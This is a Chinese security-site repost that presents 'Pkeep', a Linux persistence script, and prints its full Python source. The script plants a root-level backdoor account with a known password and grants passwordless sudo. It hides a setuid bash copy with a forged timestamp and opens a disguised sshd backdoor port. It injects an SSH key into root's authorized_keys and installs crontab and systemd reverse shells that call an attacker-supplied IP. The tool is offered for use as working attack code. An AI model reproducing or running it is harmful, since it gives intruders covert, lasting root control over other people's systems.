Pkeep - 简单方便的linux权限维持脚本

admin 2024年9月10日10:54:13评论15 views字数 3925阅读13分5秒阅读模式

 

01工具介绍

简单方便的linux权限维持脚本添加

https://github.com/S-ixpence/Pkeep

功能

后门账户

为账户添加sudo权限
隐藏bash命令
软链sshd后门
crontab反向Shell
写入公钥
持久化反向Shell

Pkeep - 简单方便的linux权限维持脚本

02脚本

#!/usr/bin/env python3# -*- coding: UTF-8 -*-import osdef show():    print(        ''' _____    _  __  ______   ______   _____ |  __ \  | |/ / |  ____| |  ____| |  __ \ | |__) | | ' /  | |__    | |__    | |__) ||  ___/  |  <   |  __|   |  __|   |  ___/| |      | . \  | |____  | |____  | |     |_|      |_|\_\ |______| |______| |_|     by 帆高请选择维持方式:    [1] 添加后门账户    [2] 为账户添加sudo权限    [3] 隐藏bash命令    [4] 软链sshd后门    [5] crontab反向Shell    [6] 写入公钥    [7] 持久化反向Shell    ''')# def history():#     os.system("export HISTCONTROL=ignorespace")#     os.system(" set +o history")#     id = os.popen("history | grep -n 'ignorespace' | awk -F: '{print $1}'").read().strip()#     os.system(f"history -d {id}")#     t1 = int(os.popen("history | grep 'ignorespace' | wc -l").read().strip())#     t2 = int(os.popen("history | grep 'kfcvme50' | wc -l").read().strip())#     if t1 == 0 and t2 == 0:#         print("成功关闭历史命令记录!")#     else:#         print("关闭历史命令失败")def bDoorAdd(user):    a = int(os.popen(f"cat /etc/passwd | grep '{user}' | wc -l").read().strip())    if a == 1:        print(f"{user}账号已经存在")    else:        os.system(f"echo '{user}:advwtv/9yU5yQ:0:0:,,,:/root:/bin/bash' >> /etc/passwd")        c = int(os.popen(f"tail /etc/passwd | grep '{user}' | wc -l").read().strip())        if c == 1:            print(f"添加成功,用户名为{user},密码为:password@123")        else:            print("添加失败")def sudoAdd(user):    if int(os.popen(f"cat /etc/passwd | grep {user} | wc -l").read().strip()) == 1:        os.system(f"echo '{user} ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers")        c = int(os.popen(f"tail /etc/sudoers | grep '{user}' | wc -l").read().strip())        if c == 1:            print(f"添加成功,用户名为{user}")        else:            print("添加失败")    else:        print("账号不存在")def hideBash():    if int(os.popen("ls -al /tmp | grep '.access_1og' | wc -l").read().strip()) == 0:        os.system("cp /bin/bash /tmp/.access_1og && chmod 4755 /tmp/.access_1og")        os.system("touch -r /bin/bash /tmp/.access_1og")        os.system("chattr +i /tmp/.access_1og")        c = int(os.popen("ls -al /tmp | grep '.access_1og' | wc -l").read().strip())        if c == 1:            print("添加成功,文件名为/tmp/.access_1og")            print("使用方法./tmp/.access_1og -p")        else:            print("添加失败")    else:        print("文件已经存在")def checkPort(port):    c = int(os.popen(f"netstat -anpt | grep '{port}' | wc -l").read().strip())    if c >= 1:        return 0    else:        return 1def softLink(port):    if int(os.popen(f"find ./ -name 'su'| wc -l").read().strip()) == 0:        os.system(f"ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort={port}")        c = checkPort(port)        if c == 0:            print(f"{port}端口sshd服务开启成功")            print(f"建议使用ssh隐身登录:ssh -T root@ip -p {port}")        else:            print("启动失败")    else:        print("文件已经存在")def Timing(ip, port):    os.system(f"(printf "*/1 * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/{ip}/{port} 0>&1';rno crontab for `whoami`%100cn")|crontab -")def Pub():    c = int(os.popen("find ./ -name 'id_rsa.pub' | wc -l").read().strip())    if c == 0:        print("请先上传公钥到当前目录")    else:        os.system("(echo -e 'nn'; cat id_rsa.pub; echo -e 'nn') >> /root/.ssh/authorized_keys")        if int(os.popen("echo $?").read().strip()) == 0:            print("公钥已写入")        else:            print("写入失败")def persistShellWithSystemd(ip, port):    # 定义systemd服务文件内容    service_content = f"""    [Unit]    Description=Persistent Reverse Shell    [Service]    ExecStart=/bin/bash -c 'while true; do /bin/bash -i >& /dev/tcp/{ip}/{port} 0>&1; sleep 10; done'    Restart=always    User=root    [Install]    WantedBy=multi-user.target    """    # 将服务文件写入到systemd目录    service_path = "/etc/systemd/system/reverse_shell.service"    with open(service_path, "w") as service_file:        service_file.write(service_content)    # 重新加载systemd服务配置    os.system("systemctl daemon-reload")    # 启用并启动服务    os.system("systemctl enable reverse_shell.service")    os.system("systemctl start reverse_shell.service")    # 检查服务状态    service_status = os.popen("systemctl is-active reverse_shell.service").read().strip()    if service_status == "active":        print("反向Shell已持久化并通过systemd启动")        print("systemctl start/status/stop reverse_shell.service")    else:        print("反向Shell持久化失败,服务未启动成功")if __name__ == '__main__':    show()    #history()    id = input("序号:")    if id == '1':        user = input("请输入添加账号名:")        bDoorAdd(user)    elif id == '2':        user = input("请输入添加账户名:")        sudoAdd(user)    elif id == '3':        hideBash()    elif id == '4':        while True:            port = input("希望开放端口:")            c = checkPort(port)            if c == 0:                print("端口被占用")                continue            else:                softLink(port)                break    elif id == '5':        ip = input("请输入ip:")        port = input("请输入端口号:")        Timing(ip, port)    elif id == '6':        Pub()    elif id == '7':        ip = input("请输入ip:")        port = input("请输入端口:")        persistShellWithSystemd(ip, port)    else:        print("无效的序号")
 

原文始发于微信公众号(夜组安全):Pkeep - 简单方便的linux权限维持脚本

 

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月10日10:54:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Pkeep - 简单方便的linux权限维持脚本https://cn-sec.com/archives/3149063.html

发表评论

匿名网友 填写信息